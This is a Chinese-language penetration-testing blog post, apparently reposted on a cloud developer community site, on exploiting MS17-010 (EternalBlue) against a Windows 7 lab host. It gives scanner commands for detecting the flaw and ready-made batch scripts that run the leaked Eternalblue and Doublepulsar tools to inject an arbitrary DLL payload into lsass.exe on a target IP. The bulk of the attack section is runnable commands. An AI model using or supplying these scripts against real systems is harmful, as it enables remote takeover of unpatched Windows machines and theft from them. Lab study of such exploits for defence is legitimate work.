AI 助理
备案控制台
开发者社区 安全 文章 正文

域渗透|浅谈MS17010多种打法(一)

2023-02-14 572
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 域渗透|浅谈MS17010多种打法
  • 本文主要介绍NSA原版MS17-010利用
  • metasploit 利用网上太多了,这里就不介绍了

漏洞介绍

漏洞名称:永恒之蓝

漏洞编号:MS17-010,CVE-2017-0143/0144/0145/0146/0147/0148

漏洞类型:缓冲区溢出漏洞

漏洞影响:Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; Windows Server 2016

实验环境

kali

  • ip:192.168.0.18


win7

  • ip:192.168.0.28

a63fdfd1bafc54657576417d94a181ef_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

53dc88861dca073f8cf289fcb0b7b436_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

015a543d999012e7ee663542adfa4b63_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

109bff5ebf4dea7da39f7e1fcfd202cf_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

MS17010检查

checker.py

GitHub:https://github.com/worawit/MS17-010

python2 checker.py 192.168.0.28

205b847198fd8cb4762ad91af1789d10_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

check.bat

GitHub:https://github.com/3gstudent/Smbtouch-Scanner

新建check.bat

@Smbtouch-1.1.1.exe --TargetIp %1 --OutConfig 1.txt
check.bat 192.168.0.28

76d479418df5d191e60aca5c393892cc_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

Ladon

Ladon.exe 192.168.0.28 MS17010

c7bd5db347dd7aeb95a58417a1c86385_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

fscan

fscan -h 192.168.0.28

3c26b78ccd0241d67486a0ec0801c523_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

总之方法有很多,选择自己喜欢的

MS17010利用

有防火墙

参考:

本人没成功,终究还是太菜了

【MS17010打法】 https://www.bilibili.com/video/BV1Ye4y1k7X9/?share_source=copy_web&vd_source=2eb72ea5238fe3398c820713b04697ff

无防火墙

环境和上面不一样,但是不影响

Github:

  1. https://github.com/x0rz/EQGRP_Lost_in_Translation

将工具包中以下三个目录中的文件拷贝到同一个目录中(因为64位系统是支持32位的,所以直接复制32位的就好):

windows\lib\x86-Windows\

windows\specials\

windows\payloads\

然后在目录中,把Eternalblue-2.2.0.0.xml文件重命名成Eternalblue-2.2.0.xml,Doublepulsar-1.3.1.0.xml改为Doublepulsar-1.3.1.xml

为了方便使用,编写bat脚本

attack.bat 192.168.0.28

@echo off
echo =============== [ TargetIp: %1 ] ===============
Eternalblue-2.2.0.exe --InConfig Eternalblue-2.2.0.xml --TargetIp %1 --TargetPort 445 --Target WIN72K8R2

backdoor.bat 192.168.0.28 exp.dll

@echo off
echo ================================================
echo [info] TargetIp: %1
echo [info] Architecture: %2
echo [info] DllPayload: %3
echo ================================================
Doublepulsar-1.3.1.exe --InConfig Doublepulsar-1.3.1.xml --TargetIp %1 --TargetPort 445 --Protocol SMB --Architecture %2 --Function RunDLL --DllPayload %3 --payloadDllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine "" --NetworkTimeout 60
  1. https://github.com/Telefonica/Eternalblue-Doublepulsar-Metasploit

deps文件夹,在目录中,把Eternalblue-2.2.0.0.xml文件重命名成Eternalblue-2.2.0.xml,Doublepulsar-1.3.1.0.xml改为Doublepulsar-1.3.1.xml

2d0ef6f69cb52e2994c69cbf4c01c22e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

编写bat脚本,使用方法和上面一样

@echo off
echo =============== [ TargetIp: %1 ] ===============
Eternalblue-2.2.0.exe --TargetIp %1 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig outlog.txt
@echo off
echo ================================================
echo [info] TargetIp: %1
echo [info] Architecture: %2
echo [info] DllPayload: %3
echo ================================================
Doublepulsar-1.3.1.exe --InConfig Doublepulsar-1.3.1.xml --TargetIp %1 --TargetPort 445 --Protocol SMB --Architecture %2 --Function RunDLL --DllPayload %3 --payloadDllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine "" --NetworkTimeout 60


文章标签:
Windows
网络安全
安全
亿人安全
目录
相关文章
萝卜带泥
|
2月前
|
安全 网络安全 量子技术
数字堡垒之下:网络安全与信息保护的现代策略
在数字化浪潮中,网络安全成为守护个人隐私与企业资产的关键盾牌。本文将深入探讨网络安全漏洞的成因与对策,加密技术的最新进展,以及提升安全意识的重要性。从网络攻击的演变到防御机制的升级,我们将一同穿梭于这场看不见硝烟的战争中,揭示保护信息安全的现代策略。
萝卜带泥
62 1
亿人安全
|
安全
域渗透|浅谈MS17010多种打法(二)
域渗透|浅谈MS17010多种打法
亿人安全
337 0
域渗透|浅谈MS17010多种打法(二)
阿里云柳璃
如何把每天的互联网信息变成“市场情报”?|也许这里有答案
产品原理摘要:最快2分钟感知数据;海量源站抓取+语义识别+情感趋势分析+传播路径+受众画像=透视趋势。   今年四月份,阿里云ET(ET的前身是阿里云小Ai)预测《我是歌手》决赛名次,在比赛的3个小时里实时分析了几百万条微博内容,这帮助ET成功预测了粉丝投票排序,
阿里云柳璃
10610 0
技术小美
|
Web App开发 安全 Java
7月第4周安全回顾 Web安全威胁目标转移 Excel成垃圾新贵
技术小美
1436 0
技术小美
|
安全 Windows
11月第3周安全回顾 小心在线欺诈 两巨头同出Top 10威胁报告
技术小美
1018 0
晚来风急
|
Web App开发 安全
【CS论坛】网络空间威胁:理想与现实的差距
本文讲的是【CS论坛】网络空间威胁:理想与现实的差距,安全高管人员的观念与网络空间安全的现实差距,正在不断的扩大。
晚来风急
1114 0
晚来风急
知识产权攻击是从哪冒出来的?
本文讲的是知识产权攻击是从哪冒出来的?,如果你的业务就是你的知识产权,你应当开始注意别有用心的人了。
晚来风急
931 0
晚来风急
|
数据采集 Web App开发 安全
Akamai发布2016Q2互联网发展状况安全报告 称中国是全球第二web攻击源
晚来风急
1386 0
晚来风急
|
安全
蜻蜓组织正在攻击多国能源行业 能控制运营系统计算机且更为隐蔽
晚来风急
1242 0
boxti
|
数据安全/隐私保护
新型网络勒索软件“黄金眼”出现,HR成为其主要目标
boxti
1283 0

热门文章

最新文章

  • 1
    helloworld
  • 2
    6.2. Apt-Get
  • 3
    Oracle 11g RAC ASM 错误之(1)
  • 4
    7-1 网络编程技术(下)-2
  • 5
    SANYUKI:净化空气,顺便美颜?
  • 6
    人工智能项目正在起飞:这对未来的工作意味着什么?
  • 7
    核心开发者宣称比特币失败 清货离场
  • 8
    重启数据库的一场闹剧
  • 9
    iconv vs mb_convert_encoding
  • 10
    poj 1247 Magnificent Meatballs
  • 1
    文档智能与检索增强生成结合的LLM知识库方案测评:优势与改进空间
    23
  • 2
    文档智能与检索增强生成结合的LLM知识库方案测评:优势与改进空间
    18
  • 3
    AICG:认识你,真好
    23
  • 4
    自建内网穿透服务器
    28
  • 5
    SpringBoot使用mysql查询昨天、今天、过去一周、过去半年、过去一年数据
    24
  • 6
    PHP中的异常处理与最佳实践####
    18
  • 7
    探索人工智能与大数据的融合之美####
    21
  • 8
    智能化运维:从被动响应到主动预防####
    18
  • 9
    springboot中使用knife4j访问接口文档的一系列问题
    31
  • 10
    后端开发中的微服务架构实践与挑战####
    20

    • 相关课程

    更多
  • 信息科技前沿技术及应用趋势
  • 1NN决策体系之人力360,何以引领企业跨越人才管理新高度
  • 互联网安全-移动APP漏洞风险与解决方案
  • 2020版大数据实战项目之DMP广告系统(第二阶段)

    • 相关电子书

    更多
  • 互联网技术发展的几个观察
  • 思科软件定义访问:实现基于业务意图的园区网络
  • 2017年中国SaaS用户研究报告
    • 下一篇
    DataWorks智能数据建模全面公测开始啦!